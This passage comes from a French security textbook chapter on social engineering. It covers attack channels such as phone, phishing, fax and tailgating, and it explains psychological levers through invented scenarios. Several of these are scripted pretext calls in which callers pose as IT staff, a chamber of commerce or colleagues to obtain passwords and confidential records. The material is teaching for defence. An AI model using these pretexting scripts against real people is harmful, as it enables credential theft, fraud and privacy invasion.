ler son ton et sa voix, les crispations et expressions de son visage ne 
risquent pas de trahir son stress. 


Mais le téléphone n'est pas la seule voie disponible. Les e-mails de phishing 
(hameçonnage dans le jargon traduit), dont la technique consiste à faire 
croire à un e-mail officiel (d'une banque, d'un magasin en ligne, d'un opéra- 
teur) dans le but de tromper le destinataire, entrent directement dans la 
catégorie des médias dès lors que ces e-mails sont utilisés envers une 
unique cible, avec un contenu très personnalisé pour maximiser les chances 
de réussite de l'attaque. 


Avant les e-mails, il y eut le courrier. Et avant le téléphone, les facsimilés 
(que l'on appelle plus couramment "Fax"). Courrier et fax sont encore très 
utilisés, parce qu'ils donnent une impression de sérieux. En effet, un cour- 
rier écrit sur un papier à en-tête s'accueille d'une toute autre manière qu'un 
courriel, même si celui-ci comporte une signature en bonne et due forme. 
Le facsimilé et le courrier bénéficient d'une croyance voulant que puisque 
leur envoi n'est pas gratuit, contrairement à l'e-mail, les expéditeurs font 
preuve de sélection dans leurs campagnes d'envois. C'est sans compter sur 
tous les publicitaires qui ont bien exploité cette conviction depuis des 
années, et surtout sans compter sur les budgets des assaillants, qui peuvent 
s'offrir (parfois très largement) les services de la Poste pour les quelques 
dizaines de centimes que leur coûtera le timbre. 


Le téléphone, le courrier, le fax et même l'e-mail permettent à l'assaillant 
une attaque à distance, mais les plus vaillants de tous iront parfois bien 
au-delà : ils iront jusqu'à se présenter dans les locaux de leur cible, en 
déjouant les systèmes de sécurité parfois d'une manière très simple. Des 
exemples concrets peuvent être admirés dans de nombreux films, comme 
par exemple dans un James Bond ("Diamonds are forever") où l'agent secret 
le moins secret du monde réussit à échapper à un contrôle de badge à 
l'entrée d'un bâtiment en suivant simplement une personne qui passe la 
porte de sécurité, profitant de l'inattention du garde qui ne se doute pas 
que l'un des deux ne possède pas son badge parce qu'il s'est laissé duper par 
la présence d'un visage connu. 
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Cette technique très courante se réalise plus généralement avec un groupe 
de personnes : seul au milieu de plusieurs, l'attaquant essaie de se faire pas- 
ser pour un membre du groupe aux yeux du garde, tout en faisant croire au 
groupe lui-même, par un comportement semblant aussi naturel que pos- 
sible, qu'il est autorisé à accéder aux locaux. Cette technique relevant du 
quiproquo est appelée TailGating. 


Il existe bien sûr d'autres médias possibles : les outils de messagerie instan- 
tanée et les réseaux sociaux. Il est très courant d'y trouver de nombreuses 
informations, sur les relations professionnelles qui lient des personnes, sur 
des numéros de téléphone professionnels, sur des projets en cours, et même 
si ces informations sont partielles, elles n'en sont pas moins très importan- 
tes. En effet, nous allons voir ci-après que le « savoir faire-croire » est im- 
portant et que pour y parvenir, il faut avoir des informations, ne serait-ce 
que pour s'exprimer dans le même jargon que les collaborateurs de 
l'entreprise. 


Pour tout cela, l'attaquant devra mener une véritable enquête avant de pas- 
ser ses appels téléphoniques : il fera un vrai travail de détective (d'ailleurs, 
de nombreux détectives utilisent le social engineering) pour obtenir ses ren- 
seignements, n'hésitant pas à fouiller les poubelles (pour obtenir des noms), 
à interroger des gens (pour obtenir des informations sur la hiérarchie), à 
observer devant l'entreprise pour connaître les horaires de travail de l'entre- 
prise ou la voiture de chacun. Dans les premiers chapitres du livre, il est 
expliqué que les intrusions sont des processus cycliques, où il est question 
de prendre des informations puis de s'en servir pour progresser un peu plus. 
À ce titre, la manipulation sociale peut donc s'appuyer sur des découvertes 


précédentes obtenues grâce à l'exploitation de faiblesses diverses, et 
permettre de progresser un peu plus dans l'histoire du détournement. 


Tous ces détails sont importants. En appréhendant parfaitement l'entre- 
prise, l'assaillant peut utiliser les procédures internes de vérification pour se 
fondre dans la masse, profitant d'une sensation de sécurité. C'est ce qui se 
passe quand on repose toute la protection sur un contrôle à l'entrée d'un 
bâtiment : si la personne est à l'intérieur des locaux, alors elle a passé le 
portail de sécurité, donc elle est en droit d'être ici, donc on ne prend pas la 
peine de l'interroger même si son visage n'est connu de personne et qu'elle 
ne porte pas de badge. D'autant que cette personne se comporte comme si 
elle avait toujours vécu là. 
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3.2 


3.2.1 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Pour littéralement détourner les procédures de sécurité et parvenir à ce 
genre de situation, les assaillants peuvent utiliser les grands moyens, même 
coûteux. Si le but de l'attaque est de détourner une somme d'argent consé- 
quente, ce n'est qu'un petit investissement que de faire imprimer du papier 
à en-tête avec filigrane (en prenant pour modèle une lettre trouvée dans la 
poubelle de l'entreprise), ou de faire fabriquer de faux papiers qui, bien 
qu'imparfaits, feront illusion parce que les personnes n'appartenant pas à 
une autorité judiciaire sont souvent mal conseillées sur les vérifications à 
apporter sur les papiers d'identité. Les assaillants n'hésitent pas à dépenser 
un millier d'euros s'il s'agit d'en récupérer dix. À l'étranger, il est possible 
d'ouvrir une vraie société pour seulement quelques centaines d'euros ; de 
louer un serveur dédié pour quelques dizaines d'euros dans un pays avec 
lequel aucun accord n'est passé en ce qui concerne la justice ; d'obtenir un 
téléphone cellulaire avec la possibilité de communiquer depuis ou vers 
l'étranger. Il est possible de recevoir un fax chez un artisan dont le magasin 
n'est pas équipé de caméras. 


Le social engineering fonctionne, et ce parce que nous l'ignorons. Les exem- 
ples ci-après sont parfois difficiles à imaginer, mais ils semblent tout à fait 
réalisables après les avoir découverts : le social engineering devient une 
chose possible, démontrée par des exemples, il devient alors plus facile de 
s'éduquer pour s'en prévenir. Mais même avec cette information, il est des 
forces et des faiblesses humaines qui se transforment en armes directement 
mises à la disposition des assaillants, et que nous allons étudier un peu. 


Les leviers psychologiques 


Explications 


L'être humain agit et décide en fonction de nombreux paramètres, parmi 
lesquels nous comptons son expérience personnelle, sa personnalité, le 
contexte de la situation et les enjeux. Il existe bien sûr de nombreux autres 
critères qui motivent les choix des êtres humains, mais nous avons ici un 
échantillon sur lequel nous pouvons agir ou que nous pouvons directement 
utiliser pour tourner à coup sûr les situations en notre faveur. 
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Il n'est certes pas possible de changer l'expérience personnelle d'une per- 
sonne, mais il est facile de s'en servir : si au cours d'une prise de renseigne- 
ments, nous apprenons que notre interlocuteur a récemment divorcé, il 
nous sera aisé d'influer sur son comportement en jouant des sentiments 
que ces situations personnelles inspirent. Par exemple, nous pouvons 
feindre d'avoir récemment divorcé pour ressembler à notre interlocuteur et 
créer un contexte d'amitié, ou feindre d'être un(e) jeune marié(e) pour créer 
un rapport tout à fait différent avec notre cible qui nous prodiguera à coup 
sûr des conseils relatifs à son expérience. Grâce à cette relation, nous pou- 
vons aisément obtenir des informations personnelles sur cette personne. 


Pour influencer les décisions et donc les actes des cibles, nous allons utiliser 
des leviers psychologiques. La liste présentée ci-après n'est pas exhaustive, il 
existe des dizaines de situations qui contrediront les exemples exposés et 
des dizaines d'autres ou aucun de ces leviers ne sera utile. Ils sont pourtant 
les plus utilisés car leur simplicité de mise en œuvre en font des outils dont 
la rentabilité est largement prouvée. 


L'absence de méfiance 


Le premier des leviers psychologiques que nous étudierons est l'absence de 
méfiance. Pour chacun des leviers étudiés, nous exposerons d'abord un 
exemple concret, pour avoir une vision pragmatique et imagée de la chose. 
Ces exemples font référence à des sociétés et des personnages inventés 
mais sont inspirés de faits rééls. 


La société Carré Innovations est aujourd'hui une grande société. Elle reçoit 
de nombreuses personnes et pour mieux les accueillir, un petit salon a été 
aménagé près du standard, avec des canapés et des journaux spécialisés 
dans l'économie, un ordinateur relié à Internet est mis à disposition. Les 
rendez-vous sont nombreux et prennent souvent plus de temps que pré- 
vu, il est donc coutume que les personnes attendent quelques minutes. 


Un jour, l'hôtesse d'accueil Bénédicte constate que l'ordinateur de la salle 
d'attente n'est plus présent. Les services techniques, contactés, déclarent ne 
pas avoir récupéré cet ordinateur, et aucun autre service de la société n'en a 
eu besoin, pour quelque raison que ce soit. 
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Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Le seul indice viendra de l'un des techniciens qui a formellement vu le 
départ de l'ordinateur au travers des vitres qui servent de cloisons à la salle 
d'attente. Un jeune homme est venu, a salué d'un mouvement de la tête 
toutes les personnes présentes autour de lui, et même Jean-Jacques, le tech- 
nicien-témoin qui se tenait debout à quelques mètres de là Ce jeune 
homme apparemment fatigué a débranché l'ordinateur, l'écran plat de 
quinze pouces, et salué de nouveau les collaborateurs et clients qui l'entou- 


raient avant de repartir avec son lourd chargement. 


Depuis, l'ordinateur a été remplacé et la nouvelle machine est solidement 
attachée grâce à un verrou dont seuls les services techniques possèdent la 
clé. 


Tout est dans la manière d'être. Ici, le jeune homme agit avec un compor- 
tement n'inspirant pas du tout la méfiance : le visage découvert, le sourire 
et même les salutations font de lui un être sympathique, si ce n'est que sa 
tâche semble devoir être accomplie rapidement et que nous ne voudrions 
pas lui faire perdre de temps. L'atout réside dans l'audace de l'opération : 
venir dérober l'ordinateur dans les locaux même de l'entreprise en pleine 
journée, c'est s'exposer au risque d'être arrêté par un collaborateur, et les 
possibilités de fuite sont très réduites. Il y a fort à parier que cet assaillant 
avait pris ses renseignements, pour pouvoir donner des prénoms si on lui 
demandait des comptes : « un tel, des services techniques, m'a demandé de 
lui démonter l'ordinateur ». 

Bien sûr, ce fait n'aurait pas pu être possible dans une petite entreprise, où 
tous les collaborateurs se connaissent. Il reste à espérer pour l'entreprise 
que cet ordinateur ne contenait pas d'informations importantes, ni de mots 
de passe enregistrés, qu'il s'agisse des accès aux services internes de l'entre- 
prise (partage de fichier) ou des services Internet qu'auraient pu consulter 
les clients, durant leur attente, qui auront pu relever leur courrier 
électronique par exemple. 
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Réussir à ne pas susciter la méfiance des personnes est rarement une chose 
suffisante dans le social engineering, sauf dans quelques rares cas. Par 
contre, c'est une chose nécessaire puisqu'une personne qui se méfie com- 
mence à noter (même intellectuellement) des informations qui peuvent 
compromettre l'anonymat d'un attaquant ou même permettre à l'entreprise 
de se savoir assaillie. Rappelons que l'un des critères d'une attaque réussie 
en sécurité informatique est qu'elle ne soit pas détectée avant un certain 
temps. 


La crédulité 


L'exemple précédent a l'avantage de ne pas avoir nécessité de dialogue. Une 
personne qui parvient à gérer son stress et les signes extérieurs de celui-ci 
convient tout à fait pour la réalisation d'une attaque aussi invraisemblable 
que celle-ci. Mais il est parfois nécessaire d'avoir un dialogue avec des per- 
sonnes, surtout quand on désire leur soutirer des informations. L'idée prin- 
cipale dans la majorité des attaques, bien que peu éthique, est tout aussi 
efficace que complexe et réside en un seul point : le mensonge. Il faut 
réussir à faire croire. 


Philippe est un mécanicien très connu dans son quartier, ses mains font 
des merveilles sur tous les véhicules qui lui sont donnés à réparer. D'ail- 
leurs, sur le réseau social SoyonsAmis, il possède son propre fan club, où 
de nombreuses personnes viennent lui demander des conseils et lui propo- 
ser d'intervenir sur des véhicules qu'il ne croiserait jamais dans le garage 
pour lequel il travaille. Parce qu'il n'est pas informaticien, Philippe ne lit 
pas ses e-mails toute la journée, et pour pouvoir répondre à des demandes 
urgentes, il a laissé son numéro sur sa fiche personnelle sur le site de 


SoyonsAmis. Il reçoit un jour un coup de téléphone : 


Philippe - « Oui, allé ? » 


Attaquant .- « Bonjour, Philippe. Je suis Sophie, du site Internet Soyons- 
Amis. Je vous appelle pour vous annoncer une bonne nouvelle, j'espère ne 
pas vous déranger ? » 


Philippe .- « Non, pas du tout, allez-y ! » 
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Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Attaquant .- « Parfait, parfait. Voilà, nous nous sommes rendus compte que 
votre fiche personnelle sur notre site était particulièrement populaire et 
nous tenions à vous féliciter pour ce résultat. J'y suis allée et si j'avais la 
chance d'avoir quelqu'un comme vous dans mes relations, je serais ravie ! » 


Philippe .- « Je suis un peu gêné, mais vous savez, si besoin est, vous pou- 
vez m'appeler ! » 


Attaquant - « Merci, c'est très gentil. À vrai dire, mon coup de téléphone 
d'aujourd'hui est destiné à vous faire profiter des fonctionnalités avancées 
de SoyonsAmis, qui vont se mettre en place très bientôt. Nous mettons en 
place un système où les participants pourront répondre à des questions et 
seront notés ; à l'avenir, nous voudrions permettre aux personnes de gagner 
un peu d'argent légalement, en prodiguant des conseils, très exactement 
comme vous le faites sur votre page, et en limitant le montant pour que 
vous n'ayez pas d'obligation de déclarer cela comme une source de revenus. 
Est-ce que cela vous semble être une bonne idée ? » 


Philippe .- « Je pense même que c'est une excellente idée, mais je n'ai pas 
, 
pour volonté de faire payer mes conseils, en fait. » 


Attaquant .- « Oui, je comprends, et je m'excuse parce que j'ai oublié de 
préciser que les gains sont financés par la publicité, vous savez que cela se 
fait beaucoup maintenant sur Internet, et pour les personnes qui vous po- 
sent des questions, cela reste entièrement gratuit ! » 


Philippe .- « Dans ce cas, c'est une solution excellente, à 100 % ! » 


Attaquant - « Vous m'en voyez ravie, je vous propose donc d'être notre 
testeur, pour vous, cela ne change strictement rien, si ce n'est que d'ici 
quelques temps, nous commencerons à vous envoyer des chèques, très rapi- 
dement je pense si vous continuez à jouir de votre si bonne réputation ! Il 
me faudrait juste avoir confirmation de votre nom d'utilisateur et de votre 
mot de passe, pour être sûre que vous soyez la bonne personne et que vous 
soyez consentant pour participer à ces nouveautés ». 
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Philippe, enjoué à l'idée de gagner un peu d'argent, indiqua ses identifiants 
à la demoiselle qui venait de lui annoncer de bonnes nouvelles. Demoiselle 
qui, en fait, profita des identifiants pour modifier la page personnelle de 
Philippe, changer le mot de passe et indiquer l'adresse d'un garage pour 
accueillir toutes les personnes qui désiraient poser des questions. 


Philippe tenta en vain de rétablir les choses en rentrant du travail, le soir. 
Il appela les responsables du site Internet SoyonsAmis, qui lui indiquèrent 
qu'ils n'avaient jamais eu pour vocation de mettre en place un tel sys- 
tème, et qu'il leur était impossible de prouver que Philippe était le proprié- 
taire réel de cette page et qu'ils ne pouvaient absolument rien faire. 


L'espoir de gagner de l'argent facilement fait perdre raison à bien des gens, 
qui croient pouvoir jouir d'un statut particulier et qui, à ce titre, oublient 
quelques règles basiques pour aller plus vite. Dans cette histoire, Philippe se 
laisse emporté par la joie de gagner de l'argent et est trahi par la gentillesse 
de la personne qui l'appelle, une femme, choix qui n'est pas fait au hasard. 


La crédulité permet beaucoup de choses à un attaquant, notamment de se 
faire passer pour quelqu'un d'autre dans le cas présent. Et les mensonges, 
aussi incroyables puissent-ils paraître, sont parfois très facilement crus par 
la cible. Dans notre exemple, sa naïveté entraîne Philippe à ne pas vérifier 
que la personne qui l'appelle n'est peut-être pas une personne responsable 
du site SoyonsAmis, il a cru sans vérifier tout ce qui lui était dit et doit 
maintenant faire face à une situation fort désagréable qu'il mettra bien du 
temps à rétablir. 


L'ignorance 


Nous avons abordé précédemment l'intrusion physique, qui peut paraître 
invraisemblable jusqu'à avoir été testée : il suffit de tenter d'entrer dans 
une soirée privée sans invitation, de se faire passer pour un journaliste pour 
rencontrer une star ou de pénétrer dans une entreprise sans avoir de badge 
d'accès. L'idée est de se comporter de la même manière que les autres 
personnes qui sont dans le droit, elles, d'entrer. Mais il y a plus invraisem- 
blable encore : la demande directe. Les stratagèmes les plus complexes sont 
parfois tout à fait inutiles, puisque le simple fait de demander directement 
peut parfois être suffisant. 
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Apprendre l'attaque pour mieux se défendre 


Marc est chasseur de têtes pour un cabinet de recrutement. En cette fin 
d'année, les chiffres de la société sont bons mais son résultat personnel 
l'est un peu moins, et sa prime de fin d'année risque d'être un peu ame- 
nuisée. Il décide alors de reprendre un dossier que ni lui ni ses collègues 
n'ont voulu traiter quelques semaines auparavant, parce qu'il présentait 
une difficulté particulière : le profil recherché ne concerne que très peu de 
personnes tant les compétences sont précises. Au mieux, il faudrait réussir 
à débaucher un ingénieur d'une société concurrente, mais encore faut-il 
savoir le joindre. 


Standard .- « Société JTU ELEC, bonjour, que puis-je faire pour vous ? » 


Marc .- « Bonjour, je vous appelle parce que j'ai un problème sur mon 
Teck800, j'aurai voulu joindre un technicien qui pourrait m'aider. » 


Standard .- « Oui, bien sûr, je vais vous mettre en relation avec le service 
après-ventes. » 


Marc .- « Non, voyez-vous il s'agit d'un problème de cohabitation avec d'au- 
tres équipements que nous avons ici, le produit fonctionne très bien, mais 
j'ai besoin de discuter avec un expert, de vérifier que les deux produits peu- 
vent cohabiter dans une même installation. » 


Standard .- « OK, pas de problème. Je vais vous mettre en relation avec 
Gregory, notre responsable développement, ne quittez pas. » 


Marc .- « Merci monsieur. » 


Marc et Gregory eurent une courte discussion où Marc indiqua clairement 
ses volontés. Bien que fidèle à son entreprise (qui l'avait accueilli dès la fin 


de ses études), Gregory donna à Marc son numéro personnel pour qu'il 
puisse être contacté en dehors des heures de travail, et qu'ils puissent ainsi 
discuter des différentes propositions de postes et de carrière. 


Même une information banale peut être dangereuse. Bien sûr, il faut éviter 
de tomber dans la paranoïa. Mais dans notre histoire, le fait que le standar- 
diste ignore que joindre directement l'un des experts est une chose dange- 
reuse peut amener à des situations gênantes pour l'entreprise. Nous le ver- 
rons dans un autre exemple, de nombreuses informations dans l'entreprise 
peuvent être utilisées contre l'entreprise elle-même. 
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Il faut donc que tous les collaborateurs sachent quelle information peut 
être donnée, et quelle information ne le peut pas. 


La confiance 


Francis et Sandrine sont étudiants en mathématiques. Amis depuis l'en- 
fance, ils s'amusent depuis toujours à se lancer des défis, pour s'en amu- 
ser, ou pour pousser l'autre à dépasser ses limites. Francis propose à San- 
drine de tenter de découvrir autant de détails que possible sur une société 
choisie au hasard, le gagnant étant celui des deux qui obtient le plus de 
renseignements ; et comme ils sont amis, ils se mettront d'accord pour 
juger de la qualité des informations recueillies. Francis est convaincu de 
gagner : Sandrine ne connaît pas les requêtes avancées du moteur de 
recherche Google, et fait souvent appel à lui pour faire ses recherches sur 
Internet. Sandrine, elle aussi, est convaincue de gagner, parce qu'elle va 
tenter de quérir les éléments les plus indiscrets de la société pour privilé- 
gier la qualité à la quantité. Dans un annuaire, ils choisissent la société 
unipersonnelle JUMPLOW, qui possède un site Internet. 


SARL Carreaux .- « Société Jumplow, bonjour.» 


Sandrine .- « Bonjour monsieur, Linda de la Chambre de Commerce et 
d'Industrie. Je vous appelle pour mettre à jour votre dossier, selon les dispo- 
sitions légales en vigueur.» 


SARL Carreaux .- « D'accord, que puis-je vous donner comme informa- 
tions ? » 


Sandrine .- « Tout d'abord, nous allons vérifier quelques informations, le 
SIRET, le numéro de TVA et bien sûr l'adresse de votre entreprise.» 


Sandrine et le gérant font alors quelques vérifications sur ces numéros dis- 
ponibles publiquement auprès des CCI. 


Sandrine .- « Parfait. Pour les statistiques de la Chambre de Commerce, 
j'aurai également besoin de connaître votre chiffre d'affaires prévisionnel, 
même une valeur approchée, pour l'année 2009. » 


SARL Carreaux .- « Oh, à cette époque c'est difficile de prévoir, mais ce sera 
vers les 80.000 euros je pense. Plus, j'espère ! » 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Sandrine .- « C'est tout le mal que je vous souhaite ! Encore une question : 
si c'est le cas, vous pouvez m'indiquer quelques sociétés dépendant de notre 
CCI et avec lesquelles ou pour lesquelles vous travaillez ? Nous cherchons 
à qualifier le dynamisme entre les entreprises de notre CCI, pour éventuel- 
lement apporter des corrections et aider les synergies. » 


SARL Carreaux - « Excellente idée, je travaille déjà avec Démon & Fils et la 
société Athunes, plus quelques-unes qui sont des fournisseurs. Notre affaire 
tourne pas mal à l'étranger, un peu moins en local … » 


Sandrine .- « C'est déjà très bien ! » 


Sandrine termine la discussion avec des questions très simples dont elle 
connaît déjà les réponses, et en demandant son avis sur la CCI au gérant. 


Sandrine gagna le pari. Alors que Francis lui apporta des numéros de télé- 
phone, le numéro de SIRET et le nom du gérant, Sandrine lui donna en 
plus le CA prévu pour 2009, le nom de quelques clients et même d'autres 
indiscrétions que laissa échapper le gérant dans la discussion. 


Ici, Sandrine utilise le vecteur de la confiance pour déjouer l'attention de sa 
cible. En effet, la société Carreaux reçoit un appel de la Chambre de Com- 
merce et d'Industrie, comme en reçoivent toutes les entreprises régulière- 
ment. Pour débuter le questionnaire, Sandrine va questionner le gérant sur 
des numéros, tel le SIRET ou le numéro de TVA, qui sont des informations 
souvent utilisées dans les échanges avec les CCI. Le gérant est en 
confiance : les questions ne lui semblent pas hors de propos, et de plus 
Sandrine prend soin de lui demander de vérifier les informations en lui 
citant les numéros (« Avez-vous le code TVA Intracommunautaire numéro 
XXX ? »). Sandrine en sait presque plus que le gérant lui-même, il n'a donc 
pas de raison de se méfier. Pourtant, en surfant simplement sur des sites 
comme societe.com ou infogreffe.fr, toutes les informations avancées par 
Sandrine sont disponibles publiquement et gratuitement. 


Dans l'exemple, Sandrine noie les questions importantes au milieu d'autres, 
dont les réponses sont connues ou dont elle se moque éperdument (c'est le 
cas avec la question « Que pensez-vous de la CCI ? »). L'idée est d'endormir 
l'attention de l'interlocuteur, en l'amenant à répondre très rapidement à 
plusieurs questions, provoquant chez lui un réflexe pour accélérer 
l'échange : celui de répondre sans réfléchir ou presque. 
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L'altruisme 


Dans le social engineering, une méthode intéressante est de susciter chez la 
cible l'envie de vous aider, inversant presque les rôles dans le sens où les 
informations vont émaner de la cible, dans le meilleur des cas avant même 
que l'assaillant ne les demande. 


Coralie est pédopsychiatre dans une petite clinique de Bretagne. Grande 
adoratrice des enfants, elle supporte difficilement les personnes qui met- 
tent leur vie en danger. A fortiori, elle n'a donc aucune raison d'apprécier 
son voisin qui roule avec un véhicule de forte puissance, n'hésitant pas à 
franchir les limitations de vitesse et circulant dans le quartier résidentiel à 
des vitesses dépassant de loin le raisonnable. Son pare-brise arbore une 
vignette d'assurance avec un logo représentant une étoile de mer, mais 
Sandrine est convaincue qu'il s'agit d'un faux. 


Assurances Etoiles .- « Assurances Etoiles, bonjour, que puis-je faire pour 
vous ? » 


Coralie .- « Bonjour, je suis de la maison. Je suis en déplacement sur votre 
région pour le service commercial, et je voudrais vendre une assurance à un 
assuré qui vient de s'acheter une très grosse voiture... mais voilà, j'ai fait 
200 kilomètres, j'ai préparé mon discours commercial toute la nuit et j'ai 
oublié son dossier chez moi. » 


Assurances Etoiles .- « Effectivement, cela va être moins facile que prévu 
pour le coup. Est-ce que je peux vous le lire, et vous prenez quelques 
notes ? » 


Coralie - « Moins facile. Je risque de gros problèmes avec mon responsable 
s'il apprend ça ! De plus, je ne vais pas avoir l'air très sérieuse devant le 
client avec mes notes manuscrites. » 


Assurances Etoiles - « Si vous aviez un ordinateur, vous pourriez accéder à 
ClassClient 3.0, mais là, je ne sais pas comment faire. » 


Coralie .- « Attendez, je passe près d'une boutique de téléphonie, ils ont for- 
cément un fax. Vous pourriez m'en envoyer un ? » 


Assurances Étoiles .- « Oui, si vous me donnez le numéro d'assuré et le 
numéro du fax je peux vous l'envoyer. » 
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Coralie .- « Super ! Vous me sauvez la vie, j'aurais peut-être perdu ma place 
si vous n'étiez pas là. Le numéro est le 01.23.4567 89 et le dossier concerne 
un monsieur G.D. À l'adresse... » 


Coralie a eu confirmation de ses soupçons : le dossier de cette personne 
contient la mention d'une assurance voiture mais qui n'est plus payée 
depuis près de deux ans. Pour une telle cylindrée, le prix est assez exorbi- 
tant et Coralie comprend pourquoi son voisin préfère s'abstenir d'être 
assuré. 


Susciter l'envie d'aider est très simple, en réalité. Il suffit de faire croire à 
l'interlocuteur qu'on se ressemble, et ensuite de se prétendre dans une 
situation que personne ne voudrait vivre, et dont tout le monde voudrait 
nous sortir pour peu que cela ne coûte rien, ou presque. Et dans notre 
exemple, c'est le cas : la standardiste peut aider Coralie qui se trouve dans 
une position délicate et qu'entre collègues, il est normal de s'entraider. À 
noter, le numéro de fax est celui d'une boutique quelconque, qui fera payer 
quelques euros à Coralie pour recevoir le fax. L'anonymat n'est pas plus 
coûteux que ça. 


Le besoin d'aide 


Plus difficile que de susciter l'envie de nous aider, nous pouvons aussi créer 
chez la cible un sentiment de dépendance, en la mettant d'abord en posi- 
tion délicate et en lui proposant ensuite notre aide toute aussi bienveillante 
qu'inutile. 


Atravers S.A. est une multinationale de fabrication de jeux vidéos. Son 
siège social est situé dans un quartier réputé de Paris et, comme dans 
beaucoup d'autres entreprises, c'est là que se prennent beaucoup de déci- 
sions. Jérôme le sait bien et se dit qu'une telle situation pourrait lui per- 
mettre d'accéder à une copie du jeu vidéo dont la sortie est prévue dans 
quelques semaines. 


Atravers .- « Société Atravers, bonjour » 


Jérôme .- « Bonjour, ici Charles, du service informatique, au siège de Paris. 
Comment allez-vous ? » 
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Atravers .- « Ça va très bien, merci.» 


Jérôme .- « Dites, on va devoir interrompre l'accès assez longtemps dans 
l'après-midi, pour des raisons de maintenance, et j'essaie de dresser une liste 
des gens à rétablir rapidement, pour que le travail puisse se faire correcte- 
ment. Est-ce que vous pouvez travailler sans le téléphone et l'accès Internet 
durant l'après-midi ? » 


Atravers .- « Cela me semble difficile, un standard sans Internet ni télé- 
phone. Attendez, vous me faites peur, j'ai beaucoup de travail cet 
après-midi, des appels téléphoniques à passer, des réservations à effectuer, 
avec la sortie prochaine du jeu, on doit boucler toutes les tâches rapide- 
ment. Vous ne pouvez pas plutôt couper le week-end ? » 


Jérôme - « Malheureusement non, il faut vraiment qu'on intervienne 
aujourd'hui. Pour des raisons de sécurité, nous devons changer pas mal de 
choses sur les serveurs et il faut faire cela rapidement. Mais rassurez-vous, 
c'est pour cela que j'appelle, cela peut très bien ne durer que quelques 
minutes pour vous.» 


Atravers .- « Très bien, comment faire pour que cela aille vite ? » 


Jérôme .- « Bien il me faut simplement deux ou trois renseignements pour 
savoir quels serveurs vous utilisez, et puis votre nom d'utilisateur et votre 
mot de passe pour qu'on rétablisse votre connexion dès le début de 
l'après-midi. » 


Atravers ~- « J'utilise le G: et parfois aussi le F:, mais le G: est le plus impor- 
tant parce que c'est sur celui-ci que l'on a les documents pour le travail ici. 
Mon nom d'utilisateur est josephine.gerard, par contre on a une note qui 
dit de ne jamais fournir le mot de passe ici, même au service informatique. 
Vous avez changé d'avis ? » 


Jérôme .- « Pour le mot de passe, non, nous changeons simplement de ser- 
veur, les autres employés devront remettre leur mot de passe au fur et à 
mesure, cela va prendre plusieurs heures parce que le rétablissement va 
s'opérer service par service. Pour aller plus vite, je vais rentrer le vôtre direc- 
tement, et avec un peu de chance, vous pourrez travailler dès votre retour 
du déjeuner. C'est pourquoi j'ai besoin de votre mot de passe, cette fois 
uniquement parce que c'est un cas précis.» 
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Atravers - « Ah, d'accord. Mon mot de passe est touti8, c'est mon chien, 
Touti.» 


Jérôme a obtenu des informations, mais surtout le mot de passe d'un em- 
ployé sur le système d'information de la société. Il lui faudra maintenant 
utiliser ces informations, pour tenter une escalade de privilège par 
exemple, à moins que la société en question ne limite pas les accès aux 
données techniques. 


Au cours de cette petite histoire, Jérôme a dû faire preuve de répondant 
pour diminuer l'inquiétude de la collaboratrice face à l'idée de donner son 
mot de passe. Mais le plus important, c'est que la personne lui a fourni les 
informations dans l'espoir d'être aidée, alors même que le but de Jérôme 
est tout autre. 


L'intimidation 
Dernier levier technique de base, l'intimidation. Le concept est très simple, 


il s'agit de faire peur à la cible, en créant une situation de doute où la per- 
sonne va vouloir à tout prix éviter les problèmes. 


Sylvie est créatrice de mode indépendante. Tous les jours, elle rencontre 
des clients potentiels. Dernièrement, l'un d'entre eux lui a fait faux bond 
en prétextant ne pas avoir pas reçu de sa part l'e-mail de confirmation de 
commande pour une collection de plusieurs dizaines de créations. Con- 
vaincue d'avoir envoyé l'e-mail et que celui-ci a bien été reçu, Sylvie tente 
de vérifier. Elle se fait assister par Jean, un ami informaticien. 


Jevend .- « Société Jevend, bonjour» 


Sylvie .- « Bonjour Madame, je suis créatrice de mode et j'aurais voulu 
prendre un rendez-vous avec Monsieur MICHEL, pour lui présenter mes 
créations. » 


Jevend .- « Oui, bien sûr. Est-ce que mardi vous convient ? » 


Sylvie .- « Ah, mardi tombe plutôt mal. Serait-il disponible lundi ? Je vis un 
peu au nord de Paris, peut-être est-ce qu'il se déplace dans ce secteur ? » 
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Jevend .- « Non, monsieur est en déplacement lundi, mais pas dans la 
région parisienne. Je n'ai malheureusement que mardi à vous proposer, au 
plus tôt ». 


Sylvie .- « D'accord. Bon écoutez, je vais tenter de m'arranger et je vous 
rappelle pour prendre rendez-vous. Merci beaucoup ! » 


Jevend .- « Aucun problème, bonne journée à vous.» 
Le lundi suivant, Sylvie appelle, elle sait que le patron est absent... 
Jevend .- « Société Jevend, bonjour.» 


Sylvie .- « Bonjour Madame, je suis standardiste et nos deux directeurs sont 
en réunion ici. Malheureusement, le vôtre a perdu le mot de passe de sa 
boîte e-mail et le mien lui a promis qu'on allait pouvoir faire quelque chose, 
vous et moi. L'ambiance est un peu tendue dans le bureau et j'ai l'impres- 
sion qu'on risque gros si on n'arrive pas à s'en sortir. Est-ce que par chance 
vous connaîtriez son mot de passe ? » 


Jevend - « Non, je n'en ai aucune idée. Peut-être y a-t-il un moyen de le 
récupérer ou de le changer ? » 


Sylvie - « Oui, bien sûr. Mon collègue du service informatique va vous 
donner la procédure ». 


Jean, l'ami de Sylvie, termine la discussion en donnant quelques indications 
pour récupérer le mot de passe. 


Sylvie découvre dans la boîte mail de monsieur MICHEL que son e-mail 
de confirmation lui est bien parvenu, et en profite pour le passer en statut 


« Non Lu », pour faire un clin d'œil discret au directeur de la société, dont 
elle sait maintenant qu'il l'a évincée pour d'autres raisons. 


Attaque en deux temps cette fois-ci, avec une première étape où Sylvie 
localise un créneau pour être sûre de pouvoir dérouler son histoire. La clé, 
c'est l'impression que l'avis du directeur dépend directement de la réussite 
de cet appel : si les deux assistantes ne trouvent pas une solution, leur 
poste est peut-être en jeu. La pression peut être telle dans ces cas-là que les 
personnes oublient complètement ce qu'il convient de faire ou ne pas faire. 
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3.3 Exemples d'attaques 


Au cours des attaques, il arrive que l'on utilise plusieurs de ces leviers, ainsi 
que d'autres. Voici quelques exemples. 


Mickael est étudiant en philosophie. Il a toujours fait preuve d'imagina- 
tion quand il s'agissait de trouver une excuse pour ne pas aller en classe 
ou pour justifier un écart de comportement, allant même jusqu'à se faire 
